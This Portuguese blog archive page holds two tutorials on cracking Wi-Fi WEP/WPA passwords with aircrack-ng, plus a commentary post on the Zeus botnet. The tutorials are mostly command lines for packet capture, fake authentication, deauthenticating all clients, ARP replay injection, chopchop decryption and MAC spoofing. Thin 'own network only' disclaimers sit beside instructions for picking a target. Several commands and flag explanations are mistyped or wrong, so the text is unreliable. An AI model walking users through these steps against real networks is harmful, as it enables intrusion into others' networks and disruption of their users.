Arquivo da categoria ‘Invasão’

Cracker PasswordQuem nunca se perguntou se tem uma senha segura de WiFi? … ops… será que existe uma senha realmente segura? Nesse tutorial, vou ensinar como capturar e descriptografar senhas wireless. Use em SUA rede, para saber se sua senha realmente é segura… lembre-se: Roubar internet do vizinho é crime! Todo o material aqui constante, serve APENAS para estudo!!!.

Para snifar, capturar e descriptografar as senhas vamos utilizar o pacote Aircrack (aircrack-ng, airomon-ng e airodump-ng). O Aircrack é um pacote de ferramentas muito poderoso para realizar ataques a redes Wireless.

Levando em consideração que você já tem um Linux instalado (aqui estou usando o Mint) em SEU NOTEBOOK, vamos começar:

Se estiver conectado em qualquer rede WiFi, desconecte-se.

Os comandos serão dados no terminal, ou seja, via linha de comando e a grande maioria deles exige logon como Root portanto, pra não ter que ficar digitando a sua senha a todo momento, abra o terminal que você vai usar e, logo de cara, digite: # sudo su

Agora vamos ao que interessa:

Primeiramente iremos colocar a interface de rede em modo Monitor, para capturar nossos pacotes. O comando é:

airmon-ng start wlan0

Após executar este comando, será criada uma interface de rede com a nomenclatura “mon0”, que irá capturar todos os pacotes que precisamos para descriptografar a senha wep ou wpa.

  • Agora iremos escanear todas as redes disponíveis;

Com o comando a seguir iremos ver todas os dispositivos de rede sem fio ao alcance da nossa interface de rede. É possível também ver os mac-address que estão conectados a um determinado dispositivo, assim, é preciso anotar os seguintes dados sobre o nosso alvo:

  • BSSID
  • CANAL
  • CIPHER
  • AUTH
  • ESSID

É preciso também anotar um MAC-ADDRESS que esteja conectado ao alvo escolhido.

airodump-ng mon0

Hora de capturar os vetores de inicialização. No comando a serguir, iremos capturar pacotes IVS que trafegam na rede. O nome do arquivo a ser gerado é você quem define, e o canal é o canal do alvo que você definiu.

airdump-ng –ivs -w captura-ivs -c 6 mon0

Explicando o comando:

  • -i = Captura apenas pacotes que contenham Ivs (–ivs);
  • -w = Nome do arquivo que será gerado com os dados capturados;
  • -c = Canal do Access Point;
  • mon0 = interface de rede em modo monitoramento.

Agora iremos enviar um pedido de falsa autenticação com um MAC associado ao acces point que queremos quebrar a senha, por exemplo:

aireplay-ng -1 0 -e NOME_DA_REDE -a MAC_ROTEADOR -h MAC_USUÁRIO mon0

  • -1 = Essa opção enviao a autenticação falsa;
  • 0 = Aqui é o tempo para reassociação, em segundos
  • -e = ESSID do alvo, ou seja, o nome do Access Point
  • -a = Mac-Address do Access Point alvo
  • -h = Mac-Address de alguém que esteja conectado (associado) ao access Point
  • mon0 = interface de rede em modo monitor.

Feito isso, aguarde que os vetores sejam capturados. Para acelerar o processo de captura de IVS, podemos tentar enviar um Arp request para a rede, na tentativa que alguma maquina receba e comece a enviar arp replay para nós. Isso fará com que o tráfego de dados aumente rapidamente:

Enviando Arp request para a rede:

aireplay-ng -3 -b 00:13:46:18:c9:58 -h 00:1f:3b:92:d1:df mon0

  • -3 = Opção para arp request;
  • -b = Mac-Address do Access Point alvo
  • -h = Mac-Address associado ao Access Point, no nosso caso o mac que identificamos como conectado ao AP “rede-segura”
  • mon0 = interface de rede em modo monitor.

Após alguns minutos de captura de pacotes (lembrar que só é possível capturar pacotes se tivermos pessoas trafego de dados na rede) iremos analisar o arquivos gerado e tentar extrair a senha do Dispositivo.

aircrack-ng -a 1 capturar-ivs-redesegura

  • a = Modo para forçar o ataque
  • -1 = wep (se fosse WPA usaríamos o -2)

Aqui iremos selecionar a nossa rede alvo, pois os dados foram capturados por canal, assim todos as redes que estão no canal “6” entram no aquivo.

Feito isso, a senha literalmente cairá no seu colo.WallPaper do tema pra vc ;-)

Frase do dia:

A prática Hacker deve ser sempre exercida de forma ética, e nunca para prejudicar, furtar, ou sacanear ninguém. É importante saber que existem várias outras formas de capturar senhas, essa é apenas uma.

É importante lembrar, também, que da mesma forma que você quebrou a senha, é possível descobrir quem está conectado à ela, ou seja, use este artigo para aprendizado apenas.

Anúncios

Zeus é um Botnet que vem tirando o sono de diversos especialistas em segurança, bem como de grandes empresas que são constantemente atacadas… porém, alguns gigantes do mundo do software, como a Windows (tsc tsc) dizem ter derrubado a maior rede maliciosa da atualidade.

Antes de tudo, vamos entender alguns termos:

BotNet: a grosso modo, é uma plataforma que controla diversos computadores de uma rede que passam a funcionar autonomamente e automaticamente. Não necessariamente é um software malicioso, pois também pode se referir a uma rede que utiliza software de computação distribuída… mas isso não vem ao caso agora… vamos falar especificamente da Botnet maliciosa: uma controladora de computadores zumbis que executam comandos de ataque sem o consentimento do usuário.

Zeus, na mitologia grega é o rei dos deuses, soberano do Monte Olimpo (onde eu vou morar???) e deus dos céus e do trovão.

Juntando Botnet + Zeus, temos:

Zeus – o Malware

Como o Deus grego, Zeus é a botnet superior, que controla diversos SERVIDORES espalhados pela internet e usa os domínios destes servidores para enviar comandos de ataque, muitas vezes direcionados.

Empresas do mundo todo, trabalhando em colaboração com serviços financeiros, desencadearam uma operação para desativar um número de botnets que se acredita ser o responsável pelo roubo de milhões de libras. Empresas como a Microsoft se vangloriam dizendo ter derrubado a rede Zeus, porém, afetam apenas os servidores já invadidos, que usam códigos antigos desta botnet. Segundo a empresa de segurança Sophos Labs, essas ações ainda não causaram qualquer “perturbação significativa” para a rede ilegal.

A guerra entre botnets e empresas de segurança cresce na mesma proporção: enquanto novos métodos de derrubada surgem, a cada instante essas redes zumbis estão mais poderosas e resistentes. O desafio da vez é eliminar a Zeus, que está dando trabalho até para ser localizada. O segredo da Zeus, segundo alguns especialistas, está em usar uma rede P2P para funcionar, oque permite seu funcionamento sem um controle central, tornando-a imune contra os atuais métodos de derrubada de botnets e dificultando ainda mais o rastreio do servidor em que ela está localizada.

Até o momento, especialistas em segurança garantem que conseguem desabilitar esse tipo de rede e que seus prejuízos não serão sentidos em longo prazo, mas… considere o upgrade da mitologia: Zeus, o rei dos deuses, soberano do Monte Olimpo e deus dos céus, do trovão e das redes de computadores globais.

No ano passado, 39 Zés Manés foram ACUSADOS de “controlar botnets de computador, assim ferindo os demandantes e seus clientes e membros”. No total, os Zés acusados infectaram SUPOSTAMENTE 13 milhões de PCs com a botnet Zeus no período de cinco anos, permitindo o roubo de mais de U$100 milhões. Além dessa, eles também foram acusados de usar a ameaça para enviar uma quantidade absurda de spam. A queixa não deu nomes, mas listou 65 apelidos associados ao Zés, incluindo “Benny, Bentley, Lucky, Mr. ICQ, Nomade… Vegi Roma e JabberZeus Crew. A alguns destes acusados, é creditado o código Zeus ou SpyEye… a outros, o desenvolvimento de explorações que ajudaram a infectar os computadores das vítmas… e em alguns outros, o recrutamento ou lavagem de dinheiro proveniente do esquema criminoso.

É fato que muitos cyber-criminosos usam o Zeus botnet para roubo de informações financeiras, credenciais online dos bancos e transferência dos fundos roubados… mas a queda do servidor botnet Zeus estaria dentro do cibercrime?  Não seria mais importante levar à justiça aqueles que escrevem, vendem, compram ou lucram com o uso do malware?

Derrubar 1 servidor de rede é uma coisa… mas… quantos ainda existem no “CyberWorld”? E olha que eu perguntei só dos servidores… e os Zumbis que continuam em atividade? 

Hoje em dia, quem não tem uma conexão Wifi disponível? Pois é… com o crescente aumento nas vendas de notebooks e consequente aumento de roteadores, torna-se cada vez mais necessária a utilização de senhas fortes, bons firewalls e outros métodos de segurança para ninguém “roubar” sua internet… e por falar nisso, vou mostrar como é possível quebrar redes, mesmo com segurança WEP e WPA1 utilizando Linux.

Começando

Pra quem nunca viu ou tem curiosidade de aprender um pouco mais sobre segurança em redes, recomendo que pesquisem bastante, tanto no google, quanto em livros especializados. Um bom livro é o “Segurança e Auditoria da Tecnologia da Informação”, de Cláudia Dias.

Vamos à ação rsrs…

Todo arquivo de captura de pacotes deve ter a extensão .cap ou .ivs.

Instale o aircrack-ng. Como uso uma versão com base em Debian, vou usar o apt-get pra instalar o pacote… caso você não ache em seu gerenciador de pacotes, pode baixar o prog no site http:\\www.aircrack-ng.org e instalar manualmente (dúvidas pra instalar? O google tira todas! 😉

Capturando os Pacotes

AIRMON-NG (vem instalado com o aircrack-ng) – é a ferramenta para colocarmos nossa placa de rede wireless no estado monitor. Antes de começar a capturar pacotes da rede, devemos utilizar esta ferramenta em modo root ou adm. A linha de execução é:

airmon-ng <start|stop> <interface> [channel]

onde <start|stop> inicia ou pára de monitorar; <interface> é a sua interface de rede, por exemplo: eth0, raw0, ath0, etc.; e [chanell] é o canal que sua placa de rede wireless irá trabalhar.

Feito isso, com sua placa de rede monitorando a rede wireless disponível, vamos para a captura dos pacotes transmitidos pelo protocolo 802.11.  Lembrando que todas as ferramentas vêm instaladas com o aircrack-ng, vamos agora utilizar a ferramenta AIRODUMP-NG.

A finalidade desta ferramenta é capturar e coletar ivs (Initialization Vectors) dos pacotes WEP. Estes são os pacotes que usaremos com o AIRCRACK-NG pra descobrir a chave que a WEP está usando.

INTERESSANTE: se você tiver um receptor GPS em seu computador, o airodump-ng irá mostrar as coordenadas do Access Point que você está coletando os pacotes.

O airodump também deve ser usado como root:

airodump-ng <options> <interfaces>

Lembrando que <interfaces> é a sua interface de rede, as <options> são:

  •  -ivs: captura somente os pacotes ivs;
  •  –gpsd: usa um dispositivo GPS, caso o tenha;
  •  –write: cria um arquivo com o nome escolhido e com a extensão .cap ou .ivs e começa a capturar;
  •  –beacons: guarda os beacons (não é guardado por padrão);
  •  –channel: especifica um canal para a captura;
  •  -a: captura na frequência de 5Ghz específica da banda A;
  •  –abg: captura tanto em frequências de 5Ghz quanto nas de 2,4Ghz.

Por padrão, o airodump-ng captura os pacotes da frequência 2.4Ghz.

Capturando e escrevendo no arquivo teste.ivs, no channel 11, nas frequências entre 2.4 e 5Ghz, com a interface da placa ath0:

# airodump-ng –ivs -write teste.ivs -c 11 –abg ath0

Captura de pacotes com o arquivo teste.cap, com as mesmas configs acima:

# airodump-ng –ivs -write teste.cap -c 11 -abg ath0

O programa airodump-ng oscila entre WEP e WAP1. Quando sua placa não rejeita pacotes corrompidos, o airodump-ng mostra isso no terminal:

Pra entender melhor:

Atacando a rede Wireless

Depois de capturar os pacotes, o próximo passo é atacar a rede com a ferramenta AIREPLAY-NG.

Existem maneiras diferentes de utilizar o programa classificadas da seguinte forma:

  • 0: Desautenticação;
  • 1: Autenticação falsa;
  • 2: Seleção interativa do pacote a enviar;
  • 3: Reinjeção ARP;
  • 4: “Chopchop” de KoreK (predicção de CRC).

Ataque Zero:

O ataque Zero, desautentica um usuário conectado ao Access Point e conecta novamente, fazendo uma nova requisição ARP e envia um novo handshake. Neste ataque, podemos:

Capturar HandShake WPA:

# aireplay-ng -0 5 -a <MAC do Access Point> -c <MAC do Client> <interface> – Reinjeção ARP (ataque 3)

# aireplay-ng -0 10 -a <Mac do Access Point> <interface> – faz todos os usuários conectados caírem para nova requisição ARP

# aireplay-ng -3 -b <MAC do Access Point> -h <MAC do Client> <interface> – reinjeção dos pacotes

Rejeitar que o cliente se conecte:

# aireplay-ng -0 0 -a <Mac do Access Point> <interface> para todos conectados no Access Point, e

# aireplay-ng -0 0 -a <Mac do Access Point> -c <MAC do Client> <interface>  para um client específico.

Ataque Um:

Este ataque funciona com êxito quando um cliente está conectado ao Access Point. Caso não tenha ou não saiba, faremos uma client para conectar a esse AccessPoint. Lembre-se sempre que é melhor ter um client conectado, pois assim iremos gerar tráfego ARP.

Vamos mudar o nosso MAC:

# ifconfig <interface> down
# ifconfig <interface> hw ether 00:11:22:33:44:55
# ifconfig <interface> up

Ataque:

# aireplay-ng -1 0 -e SeuESSID -a <MAC do Access Point> -h 00:11:22:33:44:55 <interface>

Se der certo, vai aparecer algo assim:

03:12:04 Sending Authentication Request
03:12:04 Authentication successfull
03:12:04 Sending Association Request
03:12:05 Association successfull

Como alguns Access Point podem requerer autenticação de tantos em tantos segundos, o aireplay-ng consegue fazer isso da seguinte maneira:

# aireplay-ng -1 <Qtd de Segundos> -e <Seu ESSID Falso> -a <MAC do Access Point> -h 00:11:22:33:44:55 <interface>

Caso este ataque não seja bem sucedido (o aireplay continua enviando pacotes de pedido de autenticação), pode ser que esteja usando filtro de MAC Address. Verifique o seguinte também:

  1. Está com o controlador corretamente instalado e com os patches devidamente aplicados?
  2. A placa wireless está configurada no mesmo canal que o Access Point?
  3. O BSSID e o ESSID (opções -a / -e) são as corretas? Se for Prism2, verifique se o firmware está atualizado.

Algumas placas de rede só suportam associar e injetar/monitorar através da interface Xraw, por isso, talvez você precise fazer:

# ifconfig <interface> down hw ether 00:11:22:33:44:55
#ifconfig <interface> mode Managed essid ‘the ssid’ key AAAAAAAAAA
#ifconfig <interface> up

#sysctl -w dev.<interface>.rawdev=1 (cria o <interface> Xraw)
#ifconfig <interface>raw up
#airodump-ng <interface>raw out 6

Só então, você poderá usar os ATAQUES 3 e 4 (o aireplay-ng substitui o <interface> pelo <interface>raw que criamos caso sua placa precise).

# aireplay-ng -3 -h 00:11:22:33:44:55 -b <MAC do Access Point> <interface> (ATAQUE 3)
# aireplay-ng -4 -h 00:10:20:30:40:50 -f1 <interface> (ATAQUE 4)

Ataque Dois:

Este ataque seleciona um pacote qualquer, inverte as posições dos MAC do Access Point e do Client, causando conflito e forçando o reinício, e faz a reinjeção:

# aireplay-ng -2 -b <MAC do Access Point> -n 100 -p 0841 -h <MAC do Client> -c <MAC do Access Point> <interface>

Ataque Três:

O famoso ataque de reinjeção de requisição ARP é o mais efetivo para gerar ivs. Este ataque requer um endereço MAC de um cliente associado ou um MAC falso como montamos no Ataque 1, porém, este ataque pode demorar bastante e precisa de tráfego.

Como usamos no Ataque 1:

# aireplay-ng -3 -h 00:11:22:33:44:55 -b <MAC do Access Point> <interface>

Aparecerá o seguinte:

Saving ARP request in replay_arp-0627-121526.cap
You must also start airodump to capture replies.
Read 2493 packets (got 1 ARP requests), sent 1305 packets…

Ataque Quatro:

Ataque nomeado “ChopChop” de KoreK, quando bem sucedido é ótimo pois desencripta um pacote WEP sem conhecer a sua chave e pode usar uma WEP dinâmica.

Este ataque não recupera a chave WEP, apenas revela em texto plano. Alguns Access Point não são tão vulneráveis assim, outros, parecem até mais vulneráveis por jogarem os pacotes menores que 60bytes. O aireplay-ng consegue adivinhar o resto dos pacotes menores que 42bytes que são jogados pelos Access Point.

Primeiro, desencriptamos um pacote:

#aireplay-ng -4 <interface>

Se não funcionar é porque o AccessPoint precisa de um MAC específico filtrado nele. Assim, temos que usar um MAC de um cliente conectado:

#aireplay-ng -4 -h <MAC do Client> <interface>

Segundo, o IP:

#tcpdump -s 0 -n -e -r replay_dec-0627-022301.cap

Aparecerá algo assim:

reading from file replay_dec-0627-022301.cap, link-type […]
IP 192.168.1.2 > 192.168.1.255: icmp 64: echo request seq 1

Agora, forjamos uma requisição ARP:

# arpforge-ng replay_dec-0627-022301.xor 1 <MAC do CLient> <MAC do Access Point> 192.168.1.100 192.168.1.2 arp.cap

A faixa de IP inicial (192.168.1.100) não importa, mas sim a de destino (192.168.1.2).

Reenviando o ARP forjado:

# aireplay-ng -2 -r arp.cap ath0

Desencriptando as Chaves dos Pacotes Capturados

Para desencriptar as chaves, vamos usar a ferramenta AIRDECAP-NG. Ela serve tanto para chaves WEP quanto para WPA1, que foram capturadas no arquivo.cap.

airdecap-ng [opções]

# airdecap-ng -b 00:09:5B:10:BC:5A open-network.cap
# airdecap-ng -w 11A3E229084349BC25D97E2939 wep.cap
# airdecap-ng -e ‘the ssid’ -p passphrase tkip.cap

Em outro post, vou mostrar a forma mais simples de se defender deste tipo de ataque/invasão…